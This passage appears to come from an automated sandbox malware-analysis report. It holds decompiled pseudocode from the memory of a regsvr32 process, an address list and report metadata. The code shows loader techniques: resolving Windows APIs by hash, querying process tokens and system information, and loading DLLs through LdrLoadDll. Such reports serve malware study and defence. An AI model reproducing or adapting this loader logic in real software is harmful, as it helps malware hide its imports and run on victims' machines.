														goto L160;
													} else {
														if(_t388 == 0) {
															L160:
															_push(0x3ab94787);
															_t420 = E00477564(0x3ab94787);
															if(_t420 == 0) {
																if(E00476C50(0x3ab94787) != 0) {
																	_push(0x3ab94787);
																	_t420 = E00477564(0x3ab94787);
																}
															}
															if(_t420 == 0) {
																goto L178;
															} else {
																_t445 = _t445 + 0xfffffff8;
																_t394 = E004767C8(_t420, 0x2eeff4c6);
																goto L163;
															}
														} else {
															do {
																_t360 = _t314;
																_t247 = _t360;
																while( *((intOrPtr*)(_t247 + _t388 + 8)) != 0x2eeff4c6) {
																	_t360 = _t360 + 1;
																	_t247 = _t247 + 0x18;
																	if(_t360 < 0x10) {
																		continue;
																	} else {
																		goto L159;
																	}
																	goto L236;
																}
																_t394 =  *((intOrPtr*)(_t247 + _t388 + 0x14));
																if(_t394 != 0) {
																	L163:
																	if(_t394 == 0) {
																		L178:
																		E00489510( &_v496);
																		if(_v92 != 0) {
																			E0048BE30( &_v96, _t433);
																		}
																		goto L122;
																	} else {
																		_t234 = GetTokenInformation(_v104, 0x19, _t433, _v108,  &_v108); // executed
																		if(_t234 == 0) {
																			goto L178;
																		} else {
																			_t395 =  *0x49b1f4; // 0x26b1568
																			if(_t395 == 0xc139578) {
																				 *0x49b1f4 = 0;
																				goto L171;
																			} else {
																				if(_t395 == 0) {
																					L171:
																					_push(0x3ab94787);
																					 *_t445 = E00477564(0x3ab94787);
																					if( *_t445 == 0) {
																						if(E00476C50(0x3ab94787) != 0) {
																							_push(0x3ab94787);
																							_v520 = E00477564(0x3ab94787);
																						}
																					}
																					if( *_t445 == 0) {
																						goto L176;
																					} else {
																						_t445 = _t445 + 0xfffffff8;
																						_t241 = E004767C8( *((intOrPtr*)(_t445 + 8)), 0x4e2f8db7);
																						goto L174;
																					}
																				} else {
																					do {
																						_t359 = _t314;
																						_t244 = _t359;
																						while( *((intOrPtr*)(_t244 + _t395 + 8)) != 0x4e2f8db7) {
																							_t359 = _t359 + 1;
																							_t244 = _t244 + 0x18;
																							if(_t359 < 0x10) {
																								continue;
																							} else {
																								goto L170;
																							}
																							goto L236;
																						}
																						_t241 =  *((intOrPtr*)(_t244 + _t395 + 0x14));
																						if(_t241 != 0) {
																							L174:
																							if(_t241 == 0) {
																								L176:
																								E00489510(_t445 + 4);
																								if(_v108 != 0) {
																									E0048BE30( &_v112, _t433);
																								}
																								goto L122;
																							} else {
																								_push( *_t433);
																								asm("int3");
																								return _t241;
																							}
																						} else {
																							goto L171;
																						}
																						goto L236;
																						L170:
																						asm("o16 nop [eax+eax]");
																						_t133 = _t395 + 0x180; // 0x26d90a8
																						_t395 =  *_t133;
																					} while (_t395 != 0);
																					goto L171;
																				}
																			}
																		}
																	}
																} else {
																	goto L160;
																}
																goto L236;
																L159:
																asm("o16 nop [eax+eax]");
																_t127 = _t388 + 0x180; // 0x26d90a8
																_t388 =  *_t127;
															} while (_t388 != 0);
															goto L160;
														}
													}
												} else {
													if(_v84 != 0) {
														E0048BE30( &_v88, _t432);
													}
													goto L122;
												}
											} else {
												if( *((char*)(_t445 + 0x198)) != 0) {
													E0048BE30( &_v84, _t432);
												}
												L122:
												_t434 = _t314;
												_t219 =  *0x49b1f0; // 0x26d59a0
												 *(_t219 + 0x2c) = _t434;
												goto L124;
											}
										} else {
											_t264 = E00475100(_t419, _t432, _t439);
											_t400 =  *0x49b1f0; // 0x26d59a0
											if(_t264 == 0) {
												if( *((char*)(_t400 + 0x28)) == 0) {
													 *(_t400 + 0x2c) = 3;
												} else {
													 *(_t400 + 0x2c) = 5;
												}
											} else {
												 *(_t400 + 0x2c) = 6;
											}
											L124:
											_t389 =  *0x49b1f4; // 0x26b1568
											if(_t389 == 0xc139578) {
												 *0x49b1f4 = 0;
												goto L130;
											} else {
												if(_t389 == 0) {
													L130:
													_push(0xa1310f65);
													_t316 = E00477564(0xa1310f65);
													if(_t316 == 0) {
														if(E00476C50(0xa1310f65) != 0) {
															_push(0xa1310f65);
															_t316 = E00477564(0xa1310f65);
														}
													}
													if(_t316 != 0) {
														_t445 = _t445 + 0xfffffff8;
														_t392 = E004767C8(_t316, 0x4e85f18d);
														goto L133;
													}
												} else {
													do {
														_t354 = _t314;
														_t229 = _t354;
														while( *((intOrPtr*)(_t229 + _t389 + 8)) != 0x4e85f18d) {
															_t354 = _t354 + 1;
															_t229 = _t229 + 0x18;
															if(_t354 < 0x10) {
																continue;
															} else {
																goto L129;
															}
															goto L135;
														}
														_t392 =  *((intOrPtr*)(_t229 + _t389 + 0x14));
														if(_t392 != 0) {
															L133:
															if(_t392 != 0) {
																GetSystemInfo( &_v156);
															}
														} else {
															goto L130;
														}
														goto L135;
														L129:
														asm("o16 nop [eax+eax]");
														_t103 = _t389 + 0x180; // 0x26d90a8
														_t389 =  *_t103;
													} while (_t389 != 0);
													goto L130;
												}
											}
											L135:
											_t223 =  *0x49b1f0; // 0x26d59a0
											 *((short*)(_t223 + 0xe)) = _v156.dwAllocationGranularity;
											 *((intOrPtr*)(_t223 + 0x10)) = _v156.lpMaximumApplicationAddress;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t445 + 0x16c));
											 *((intOrPtr*)(_t223 + 0x18)) = _v156.dwNumberOfProcessors;
											 *((intOrPtr*)(_t223 + 0x1c)) = _v120;
											return _t223;
										}
									} else {
										_push(_t416);
										asm("int3");
										return _t308;
									}
								} else {
									break;
								}
								goto L236;
								L10:
								asm("o16 nop [eax+eax]");
								_t6 = _t377 + 0x180; // 0x26d90a8
								_t377 =  *_t6;
							} while (_t377 != 0);
							L11:
							_push(0xa1310f65);
							_t425 = E00477564(0xa1310f65);
							if(_t425 == 0) {
								if(E00476C50(0xa1310f65) != 0) {
									_push(0xa1310f65);
									_t425 = E00477564(0xa1310f65);
								}
							}
							if(_t425 == 0) {
								goto L16;
							} else {
								_t445 = _t445 + 0xfffffff8;
								_t308 = E004767C8(_t425, 0x13e99f60);
								goto L14;
							}
						}
					}
				} else {
					return _t163;
				}
				L236:
			}

0x00473931
0x00473936
0x00473937
0x00473938
0x00473939
0x0047393f
0x00473941
0x0047394b
0x0047478e
0x00474790
0x00474795
0x00474798
0x00474798
0x00473955
0x0047396a
0x00473976
0x0047397b
0x0047397e
0x00473984
0x00473992
0x0047477d
0x00474787
0x00000000
0x00473998
0x0047399a
0x004747a2
0x00000000
0x004739a0
0x004739a0
0x004739a2
0x004739a2
0x004739a4
0x004739a6
0x004739b4
0x004739b5
0x004739bb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004739bb
0x0047476c
0x00474772
0x004739f5
0x004739f7
0x004739fc
0x004739fc
0x00473a06
0x00473a0a
0x00473a0e
0x00473a14
0x00473a17
0x00473a2d
0x00473a32
0x00473a3a
0x00473a41
0x00473a44
0x00473a4a
0x00473a51
0x00473a59
0x00474739
0x00000000
0x00473a5f
0x00473a61
0x00473a8e
0x00473a93
0x00473a99
0x00473a9d
0x00474710
0x0047471b
0x00474721
0x00474721
0x00474710
0x00473aa5
0x00473aae
0x00473ab6
0x00000000
0x00473ab6
0x00473a63
0x00473a63
0x00473a63
0x00473a65
0x00473a67
0x00473a75
0x00473a76
0x00473a7c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00473a7c
0x00474728
0x0047472e
0x00473ab8
0x00473aba
0x00473ac6
0x00473ac6
0x00000000
0x00474734
0x00000000
0x00474734
0x00000000
0x00473a7e
0x00473a7e
0x00473a84
0x00473a84
0x00473a8a
0x00000000
0x00473a63
0x00473a61
0x00473ac8
0x00473ac8
0x00473ad5
0x00473add
0x00473ad7
0x00473ad7
0x00473ad7
0x00473ae1
0x00473ae6
0x00473aee
0x00473af9
0x00473b05
0x00473b0c
0x00473b14
0x00473b1c
0x00473b25
0x00473b2e
0x00473b30
0x00473b35
0x00473b37
0x00473b44
0x00473b4b
0x00473b5d
0x00473b62
0x00473b63
0x00473b65
0x00473b6a
0x00473b72
0x00473b7b
0x00473b82
0x00473b9b
0x00473ba0
0x00473bae
0x00473bb3
0x00473bb7
0x00473bbe
0x00473c22
0x00473c27
0x00473c3a
0x00473c3e
0x00473c57
0x00473c5c
0x00473c6f
0x00473c78
0x00473c7f
0x00473cd3
0x0047465c
0x0047466f
0x0047467c
0x0047467e
0x00474687
0x00474692
0x0047468e
0x0047468e
0x0047468e
0x00474699
0x0047469c
0x0047469c
0x00474699
0x004746a1
0x004746ac
0x00000000
0x0047465e
0x00474661
0x004746bd
0x004746ca
0x004746cc
0x004746d5
0x004746e0
0x004746dc
0x004746dc
0x004746dc
0x004746e7
0x004746ea
0x004746ea
0x004746e7
0x004746ef
0x004746fa
0x00000000
0x00474663
0x00000000
0x00474663
0x00474661
0x00000000
0x00473cd9
0x00473cdc
0x00000000
0x00474108
0x0047410f
0x0047411c
0x0047411e
0x00474127
0x00474132
0x0047412e
0x0047412e
0x0047412e
0x00474139
0x0047413c
0x0047413c
0x00474139
0x00474141
0x0047414c
0x0047414c
0x00473cdc
0x00473c81
0x00473c83
0x00473ce7
0x00473cee
0x00473cfb
0x00473cfd
0x00473d06
0x00473d11
0x00473d0d
0x00473d0d
0x00473d0d
0x00473d18
0x00473d1b
0x00473d1b
0x00473d18
0x00473d20
0x00473d2b
0x00473c85
0x00473c8c
0x00473c99
0x00473c9b
0x00473ca4
0x00473caf
0x00473cab
0x00473cab
0x00473cab
0x00473cb6
0x00473cb9
0x00473cb9
0x00473cb6
0x00473cbe
0x00473cc9
0x00473cc9
0x00473c83
0x00473bc0
0x00473bc7
0x00473bd4
0x00473bd6
0x00473bdf
0x00473bea
0x00473be6
0x00473be6
0x00473be6
0x00473bf1
0x00473bf4
0x00473bf4
0x00473bf1
0x00473bf9
0x00473c04
0x00473c04
0x00473afb
0x00473afb
0x00473afb
0x00473d2d
0x00473d2d
0x00473d33
0x00473d3e
0x00473d41
0x00473d4d
0x0047464b
0x00000000
0x00473d53
0x00473d55
0x00473d82
0x00473d87
0x00473d8d
0x00473d91
0x00474622
0x0047462d
0x00474633
0x00474633
0x00474622
0x00473d99
0x00000000
0x00473d9f
0x00473da6
0x00473dae
0x00000000
0x00473dae
0x00473d57
0x00473d57
0x00473d57
0x00473d59
0x00473d5b
0x00473d69
0x00473d6a
0x00473d70
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00473d70
0x0047463a
0x00474640
0x00473db0
0x00473db2
0x00473e6d
0x00473e6d
0x00473db8
0x00473dbf
0x00473dc0
0x00473dc2
0x00473dc8
0x00000000
0x00473dce
0x00473dce
0x00473dda
0x0047418b
0x00000000
0x00473de0
0x00473de2
0x00473e0f
0x00473e14
0x00473e1a
0x00473e1e
0x00474162
0x0047416d
0x00474173
0x00474173
0x00474162
0x00473e26
0x00000000
0x00473e28
0x00473e2f
0x00473e37
0x00000000
0x00473e37
0x00473de4
0x00473de4
0x00473de4
0x00473de6
0x00473de8
0x00473df6
0x00473df7
0x00473dfd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00473dfd
0x0047417a
0x00474180
0x00473e39
0x00473e3b
0x00000000
0x00473e3d
0x00473e58
0x00473e5c
0x00000000
0x00473e5e
0x00473e68
0x00473e68
0x00473e5c
0x00474186
0x00000000
0x00474186
0x00000000
0x00473dff
0x00473dff
0x00473e05
0x00473e05
0x00473e0b
0x00000000
0x00473de4
0x00473de2
0x00473dda
0x00473dc8
0x00474646
0x00000000
0x00474646
0x00000000
0x00473d72
0x00473d72
0x00473d78
0x00473d78
0x00473d7e
0x00000000
0x00473d57
0x00473d55
0x00473e6f
0x00473e6f
0x00473e75
0x00473e8a
0x00473e8d
0x00473ec8
0x00473ece
0x00473edf
0x00474607
0x00000000
0x00473ee5
0x00473ee7
0x00473f14
0x00473f19
0x00473f1f
0x00473f23
0x004745de
0x004745e9
0x004745ef
0x004745ef
0x004745de
0x00473f2b
0x00473f34
0x00473f3c
0x00000000
0x00473f3c
0x00473ee9
0x00473ee9
0x00473ee9
0x00473eeb
0x00473eed
0x00473efb
0x00473efc
0x00473f02
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00473f02
0x004745f6
0x004745fc
0x00473f3e
0x00473f40
0x00473f4e
0x00473f4e
0x00474602
0x00000000
0x00474602
0x00000000
0x00473f04
0x00473f04
0x00473f0a
0x00473f0a
0x00473f10
0x00000000
0x00473ee9
0x00473ee7
0x00473f50
0x00473f57
0x00473f5e
0x00473f60
0x00473f6b
0x00473f8c
0x00473f92
0x00473fa3
0x004745c3
0x00000000
0x00473fa9
0x00473fab
0x00473fd8
0x00473fdd
0x00473fe3
0x00473fe7
0x0047459a
0x004745a5
0x004745ab
0x004745ab
0x0047459a
0x00473fef
0x00473ff8
0x00474000
0x00000000
0x00474000
0x00473fad
0x00473fad
0x00473fad
0x00473faf
0x00473fb1
0x00473fbf
0x00473fc0
0x00473fc6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00473fc6
0x004745b2
0x004745b8
0x00474002
0x00474004
0x00474019
0x00474019
0x004745be
0x00000000
0x004745be
0x00000000
0x00473fc8
0x00473fc8
0x00473fce
0x00473fce
0x00473fd4
0x00000000
0x00473fad
0x00473fab
0x0047401b
0x0047401b
0x00474024
0x004741de
0x004741e3
0x004741f3
0x004741f5
0x00474201
0x0047457f
0x00000000
0x00474207
0x00474209
0x00474236
0x0047423b
0x00474241
0x00474245
0x00474556
0x00474561
0x00474567
0x00474567
0x00474556
0x0047424d
0x00000000
0x00474253
0x0047425a
0x00474262
0x00000000
0x00474262
0x0047420b
0x0047420b
0x0047420b
0x0047420d
0x0047420f
0x0047421d
0x0047421e
0x00474224
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00474224
0x0047456e
0x00474574
0x00474264
0x00474266
0x00474470
0x00474474
0x00474481
0x0047448e
0x0047448e
0x00000000
0x0047426c
0x00474285
0x00474289
0x00000000
0x0047428f
0x0047428f
0x0047429b
0x0047453b
0x00000000
0x004742a1
0x004742a3
0x004742d0
0x004742d5
0x004742db
0x004742e2
0x00474511
0x0047451c
0x00474522
0x00474522
0x00474511
0x004742ec
0x00000000
0x004742f2
0x004742f2
0x004742fe
0x00000000
0x004742fe
0x004742a5
0x004742a5
0x004742a5
0x004742a7
0x004742a9
0x004742b7
0x004742b8
0x004742be
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004742be
0x0047452a
0x00474530
0x00474303
0x00474305
0x00474448
0x0047444c
0x00474459
0x00474466
0x00474466
0x00000000
0x0047430b
0x0047430b
0x0047430d
0x0047430e
0x0047430e
0x00474536
0x00000000
0x00474536
0x00000000
0x004742c0
0x004742c0
0x004742c6
0x004742c6
0x004742cc
0x00000000
0x004742a5
0x004742a3
0x0047429b
0x00474289
0x0047457a
0x00000000
0x0047457a
0x00000000
0x00474226
0x00474226
0x0047422c
0x0047422c
0x00474232
0x00000000
0x0047420b
0x00474209
0x0047402a
0x00474032
0x0047403b
0x0047403b
0x00000000
0x00474032
0x00473f6d
0x00473f75
0x00473f82
0x00473f82
0x00474040
0x00474040
0x00474042
0x00474047
0x00000000
0x00474047
0x00473e8f
0x00473e8f
0x00473e94
0x00473e9c
0x00473eae
0x00473ebc
0x00473eb0
0x00473eb0
0x00473eb0
0x00473e9e
0x00473e9e
0x00473e9e
0x0047404a
0x0047404a
0x00474056
0x004741cf
0x00000000
0x0047405c
0x0047405e
0x0047408b
0x00474090
0x00474096
0x0047409a
0x004741a6
0x004741b1
0x004741b7
0x004741b7
0x004741a6
0x004740a2
0x004740ab
0x004740b3
0x00000000
0x004740b3
0x00474060
0x00474060
0x00474060
0x00474062
0x00474064
0x00474072
0x00474073
0x00474079
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00474079
0x004741be
0x004741c4
0x004740b5
0x004740b7
0x004740c1
0x004740c1
0x004741ca
0x00000000
0x004741ca
0x00000000
0x0047407b
0x0047407b
0x00474081
0x00474081
0x00474087
0x00000000
0x00474060
0x0047405e
0x004740c3
0x004740c3
0x004740eb
0x004740ef
0x004740f2
0x004740f5
0x004740f8
0x00474107
0x00474107
0x004739f9
0x004739f9
0x004739fa
0x004739fb
0x004739fb
0x00474778
0x00000000
0x00474778
0x00000000
0x004739bd
0x004739bd
0x004739c3
0x004739c3
0x004739c9
0x004739cd
0x004739d2
0x004739d8
0x004739dc
0x00474754
0x0047475f
0x00474765
0x00474765
0x00474754
0x004739e4
0x00000000
0x004739e6
0x004739ed
0x004739f0
0x00000000
0x004739f0
0x004739e4
0x0047399a
0x0047395d
0x00473969
0x00473969
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9302ff39dba777974fec91e2f5b1a82432c7d03ad058b7c7f6878cfe76ec8bfc
Instruction ID: 5db1e254aba92d9a1b66b7aa2e0f5df3f3d3686b18fa138b8b8fcf2a5af580d2
Opcode Fuzzy Hash: 9302ff39dba777974fec91e2f5b1a82432c7d03ad058b7c7f6878cfe76ec8bfc
Instruction Fuzzy Hash: D35203306042418BD7349F2989957FB7296ABD1348F28C62FE44D9B392EB3CCD45D78A

Uniqueness

Uniqueness Score: -1.00%

Function 00476C50, Relevance: 2.1, APIs: 1, Instructions: 584
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00476C50(signed int __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t135;
				intOrPtr _t138;
				void* _t143;
				void* _t147;
				void* _t151;
				struct _OBJDIR_INFORMATION _t164;
				void* _t170;
				intOrPtr _t183;
				struct _OBJDIR_INFORMATION _t197;
				struct _OBJDIR_INFORMATION _t206;
				long _t212;
				void* _t215;
				intOrPtr _t246;
				signed int _t278;
				signed int _t279;
				void* _t281;
				intOrPtr _t282;
				void* _t291;
				void* _t340;
				struct _OBJDIR_INFORMATION _t342;
				intOrPtr _t345;
				struct _OBJDIR_INFORMATION _t363;
				intOrPtr _t366;
				struct _OBJDIR_INFORMATION _t382;
				struct _OBJDIR_INFORMATION _t389;
				struct _OBJDIR_INFORMATION _t390;
				struct _OBJDIR_INFORMATION _t391;
				intOrPtr* _t394;
				void* _t395;
				intOrPtr* _t397;
				void* _t398;
				void* _t399;
				void* _t401;
				void* _t402;
				void* _t404;
				void* _t405;
				void* _t406;
				short* _t407;
				void* _t408;
				void* _t410;
				void* _t411;
				intOrPtr _t412;
				intOrPtr* _t413;
				short* _t418;
				void* _t420;
				void* _t421;
				intOrPtr* _t422;
				void* _t424;
				void* _t425;
				struct _OBJDIR_INFORMATION* _t426;

				_t278 = __ecx;
				E00478810(_t426 + 0x2c8, 0);
				E00478810(_t426 + 0x2d0, 0);
				_t135 = E00473930(__ecx, 0, _t399, _t406);
				_t412 =  *0x49b208; // 0x26d5a38
				if( *((char*)(_t135 + 0xb)) == 0x40) {
					if(_t412 == 0x228324a5) {
						_push(0x80);
						_t413 = E00471030();
						_t426 = _t426 + 4;
						if(_t413 == 0) {
							_t413 = 0;
						} else {
							_t122 = _t413 + 8; // 0x8
							 *_t413 = 0;
							 *((intOrPtr*)(_t413 + 4)) = 0;
							E00478810(_t122, 0);
							_t124 = _t413 + 0x10; // 0x10
							E00478810(_t124, 0);
							_t125 = _t413 + 0x18; // 0x18
							E00478810(_t125, 0);
							_t126 = _t413 + 0x20; // 0x20
							E00478810(_t126, 0);
							_t127 = _t413 + 0x28; // 0x28
							E00478810(_t127, 0);
							_t128 = _t413 + 0x30; // 0x30
							E00478810(_t128, 0);
							_t129 = _t413 + 0x38; // 0x38
							E00478810(_t129, 0);
							_t130 = _t413 + 0x40; // 0x40
							E00478810(_t130, 0);
							_t131 = _t413 + 0x48; // 0x48
							E00478810(_t131, 0);
							_t410 = 6;
							_t132 = _t413 + 0x50; // 0x50
							_t404 = _t132;
							do {
								E00478810(_t404, 0);
								_t404 = _t404 + 8;
								_t410 = _t410 - 1;
							} while (_t410 != 0);
						}
						 *0x49b208 = _t413;
					}
					if(E00479DC0(_t413 + 0x38) != 0) {
						E00478810(_t426 + 0x26c, 0x80);
						_t342 =  *0x49b1f4; // 0x26b1568
						if(_t342 == 0xc139578) {
							 *0x49b1f4 = 0;
							goto L86;
						} else {
							if(_t342 == 0) {
								L86:
								_push(0xa1310f65);
								_t420 = E00477564(0xa1310f65);
								if(_t420 == 0) {
									if(E00476C50(0xa1310f65) != 0) {
										_push(0xa1310f65);
										_t420 = E00477564(0xa1310f65);
									}
								}
								if(_t420 != 0) {
									_t426 = _t426 + 0xfffffff8;
									_t394 = E004767C8(_t420, 0x7c2e142f);
									goto L89;
								}
							} else {
								do {
									_t421 = 0;
									_t395 = 0;
									while( *((intOrPtr*)(_t395 + _t342 + 8)) != 0x7c2e142f) {
										_t421 = _t421 + 1;
										_t395 = _t395 + 0x18;
										if(_t421 < 0x10) {
											continue;
										} else {
											goto L85;
										}
										goto L91;
									}
									_t394 =  *((intOrPtr*)(_t395 + _t342 + 0x14));
									if(_t394 != 0) {
										L89:
										if(_t394 != 0) {
											 *_t394( *(_t426 + 0x26c),  *(_t426 + 0x26c) >> 1);
										}
									} else {
										goto L86;
									}
									goto L91;
									L85:
									asm("o16 nop [eax+eax]");
									_t109 = _t342 + 0x180; // 0x26d90a8
									_t342 =  *_t109;
								} while (_t342 != 0);
								goto L86;
							}
						}
						L91:
						if(( *(E00479DE0(_t426 + 0x268)) & 0x0000ffff) != 0x5c) {
							E004796D0(_t426 + 0x26c, 0x5c);
						}
						_t345 =  *0x49b208; // 0x26d5a38
						E00478CC0(_t345 + 0x38,  *((intOrPtr*)(_t426 + 0x268)));
						E00478CA0(_t426 + 0x268);
					}
					_t138 =  *0x49b208; // 0x26d5a38
					E004788C0(_t426 + 0x274, _t138 + 0x38);
					E00478CC0(_t426 + 0x2c8,  *((intOrPtr*)(_t426 + 0x270)));
					_t291 = _t426 + 0x270;
				} else {
					if(_t412 == 0x228324a5) {
						_push(0x80);
						_t422 = E00471030();
						_t426 = _t426 + 4;
						if(_t422 == 0) {
							_t422 = 0;
						} else {
							_t95 = _t422 + 8; // 0x8
							 *_t422 = 0;
							 *((intOrPtr*)(_t422 + 4)) = 0;
							E00478810(_t95, 0);
							_t97 = _t422 + 0x10; // 0x10
							E00478810(_t97, 0);
							_t98 = _t422 + 0x18; // 0x18
							E00478810(_t98, 0);
							_t99 = _t422 + 0x20; // 0x20
							E00478810(_t99, 0);
							_t100 = _t422 + 0x28; // 0x28
							E00478810(_t100, 0);
							_t101 = _t422 + 0x30; // 0x30
							E00478810(_t101, 0);
							_t102 = _t422 + 0x38; // 0x38
							E00478810(_t102, 0);
							_t103 = _t422 + 0x40; // 0x40
							E00478810(_t103, 0);
							_t104 = _t422 + 0x48; // 0x48
							E00478810(_t104, 0);
							_t411 = 6;
							_t105 = _t422 + 0x50; // 0x50
							_t405 = _t105;
							do {
								E00478810(_t405, 0);
								_t405 = _t405 + 8;
								_t411 = _t411 - 1;
							} while (_t411 != 0);
						}
						 *0x49b208 = _t422;
					}
					if(E00479DC0(_t422 + 0x30) != 0) {
						E00478810(_t426 + 0x27c, 0x80);
						_t363 =  *0x49b1f4; // 0x26b1568
						if(_t363 == 0xc139578) {
							 *0x49b1f4 = 0;
							goto L10;
						} else {
							if(_t363 == 0) {
								L10:
								_push(0xa1310f65);
								_t424 = E00477564(0xa1310f65);
								if(_t424 == 0) {
									if(E00476C50(0xa1310f65) != 0) {
										_push(0xa1310f65);
										_t424 = E00477564(0xa1310f65);
									}
								}
								if(_t424 != 0) {
									_t426 = _t426 + 0xfffffff8;
									_t397 = E004767C8(_t424, 0x4ade4070);
									goto L13;
								}
							} else {
								do {
									_t425 = 0;
									_t398 = 0;
									while( *((intOrPtr*)(_t398 + _t363 + 8)) != 0x4ade4070) {
										_t425 = _t425 + 1;
										_t398 = _t398 + 0x18;
										if(_t425 < 0x10) {
											continue;
										} else {
											goto L9;
										}
										goto L15;
									}
									_t397 =  *((intOrPtr*)(_t398 + _t363 + 0x14));
									if(_t397 != 0) {
										L13:
										if(_t397 != 0) {
											 *_t397( *(_t426 + 0x27c),  *(_t426 + 0x27c) >> 1);
										}
										goto L15;
									} else {
										goto L10;
									}
									L106:
									L9:
									asm("o16 nop [eax+eax]");
									_t7 = _t363 + 0x180; // 0x26d90a8
									_t363 =  *_t7;
								} while (_t363 != 0);
								goto L10;
							}
						}
						L15:
						if(( *(E00479DE0(_t426 + 0x278)) & 0x0000ffff) != 0x5c) {
							E004796D0(_t426 + 0x27c, 0x5c);
						}
						_t366 =  *0x49b208; // 0x26d5a38
						E00478CC0(_t366 + 0x30,  *((intOrPtr*)(_t426 + 0x278)));
						E00478CA0(_t426 + 0x278);
					}
					_t246 =  *0x49b208; // 0x26d5a38
					E004788C0(_t426 + 0x2c0, _t246 + 0x30);
					E00478CC0(_t426 + 0x2c8,  *((intOrPtr*)(_t426 + 0x2bc)));
					_t291 = _t426 + 0x2bc;
				}
				E00478CA0(_t291);
				_t143 = E00480220(_t426 + 0x2d4,  *((intOrPtr*)(_t426 + 0x2c8)), 0);
				E00478810(_t426 + 0x2d8, 0x2800);
				_t407 =  *((intOrPtr*)(_t426 + 0x2d4));
				 *_t407 = 0;
				E00489470(_t426 + 0x2ac,  &E0049A1A0, 0x28);
				_t147 = E00489640(_t426 + 0x2a8, 0);
				E0048E780(_t278, _t147, E00489650(_t426 + 0x2a4));
				 *((intOrPtr*)(_t426 + 0x294)) = _t407;
				 *((char*)(_t426 + 0x290)) = 0;
				 *((intOrPtr*)(_t426 + 0x298)) = 0;
				 *((intOrPtr*)(_t426 + 0x29c)) = 2;
				 *((char*)(_t426 + 0x2a0)) = 1;
				_t151 = E00489640(_t426 + 0x2a8, 0);
				_push(_t426 + 0x290);
				_push(E00477CD0);
				_push(0);
				_push(0x7fffffff);
				_push(0x49a1c8);
				E0048E5D0(_t151, 0x28, _t407);
				E00489510(_t426 + 0x2a4);
				E00480220(_t143,  *((intOrPtr*)(_t426 + 0x2d8)), 0);
				E00478CA0(_t426 + 0x2d4);
				 *_t426 = 0;
				 *(_t426 + 4) = 1;
				 *((intOrPtr*)(_t426 + 8)) = 0;
				 *((intOrPtr*)(_t426 + 0xc)) = 3;
				E00478AB0(_t426 + 0x18,  *((intOrPtr*)(_t426 + 0x2d0)), 0);
				_push(1);
				if(E0048CEA0(_t278, _t426 + 4, 0x28, _t143, _t407) == 0) {
					L53:
					E00478CA0(_t426 + 0x10);
					if( *(_t426 + 4) != 0) {
						_t382 =  *_t426;
						if(_t382 == 0 || _t382 == 0xffffffff) {
							_t164 = 1;
						} else {
							_t164 = 0;
						}
						if(_t164 == 0) {
							E0048CE70(_t382);
						}
					}
					 *_t426 = 0;
					E00478CA0(_t426 + 0x2cc);
					E00478CA0(_t426 + 0x2c4);
					return 0;
				} else {
					_t279 = _t278 ^ 0x38ba5c7b;
					_t408 = _t426 + 0x44;
					_t401 = _t426 + 0x2e8;
					while(1) {
						E00478AB0(_t426 + 0x2e8, _t408, 0);
						E00479E70(_t426 + 0x2e4, _t401);
						E004783B0(_t426 + 0x2f0);
						_t170 = E0048D620( *((intOrPtr*)(_t426 + 0x2f0)), E00486040( *((intOrPtr*)(_t426 + 0x2f0)), 0x7fffffff));
						E00480B10(_t426 + 0x2f0);
						if(_t279 == _t170) {
							break;
						}
						E00478CA0(_t401);
						E00478CA0(_t426 + 0x2e0);
						if(E0048D0E0(_t426) != 0) {
							continue;
						} else {
							goto L53;
						}
						goto L106;
					}
					E00478CA0(_t401);
					E004788C0(_t426 + 0x2b8, _t426 + 0x2c4);
					E00480220(_t426 + 0x2bc,  *((intOrPtr*)(_t426 + 0x2e4)), 0);
					_t409 =  *((intOrPtr*)(_t426 + 0x2b4));
					_push(E00480180( *((intOrPtr*)(_t426 + 0x2b4)), 0x7fffffff,  *((intOrPtr*)(_t426 + 0x2b4))) + _t179 + 0xa);
					E00489350(_t426 + 0x284);
					_t418 = E00489640(_t426 + 0x284, 0);
					_t183 = E00489640(_t426 + 0x284, 8);
					_t402 = E00480180( *((intOrPtr*)(_t426 + 0x2b4)), 0x7fffffff, _t409);
					 *((intOrPtr*)(_t418 + 4)) = _t183;
					 *_t418 = _t402 + _t402;
					 *((short*)(_t418 + 2)) = _t402 + _t402 + 2;
					E004801B0(_t183, _t409, _t402 + _t402 + 2, _t409, 0);
					_t389 =  *0x49b1f4; // 0x26b1568
					 *(_t426 + 0x2dc) = 0;
					if(_t389 == 0xc139578) {
						 *0x49b1f4 = 0;
						goto L29;
					} else {
						if(_t389 == 0) {
							L29:
							_push(0x588ab3ea);
							_t281 = E00477564(0x588ab3ea);
							if(_t281 == 0) {
								if(E00476C50(0x588ab3ea) != 0) {
									_push(0x588ab3ea);
									_t281 = E00477564(0x588ab3ea);
								}
							}
							if(_t281 == 0) {
								goto L43;
							} else {
								_t426 = _t426 + 0xfffffff8;
								_t282 = E004767C8(_t281, 0x208c2589);
								goto L32;
							}
						} else {
							do {
								_t340 = 0;
								_t215 = 0;
								while( *((intOrPtr*)(_t215 + _t389 + 8)) != 0x208c2589) {
									_t340 = _t340 + 1;
									_t215 = _t215 + 0x18;
									if(_t340 < 0x10) {
										continue;
									} else {
										goto L28;
									}
									goto L106;
								}
								_t282 =  *((intOrPtr*)(_t215 + _t389 + 0x14));
								if(_t282 != 0) {
									L32:
									if(_t282 == 0) {
										L43:
										if( *(_t426 + 0x2dc) == 0) {
											goto L35;
										} else {
											goto L44;
										}
									} else {
										_t212 = LdrLoadDll(0, 0, E00489640(_t426 + 0x284, 0), _t426 + 0x2dc); // executed
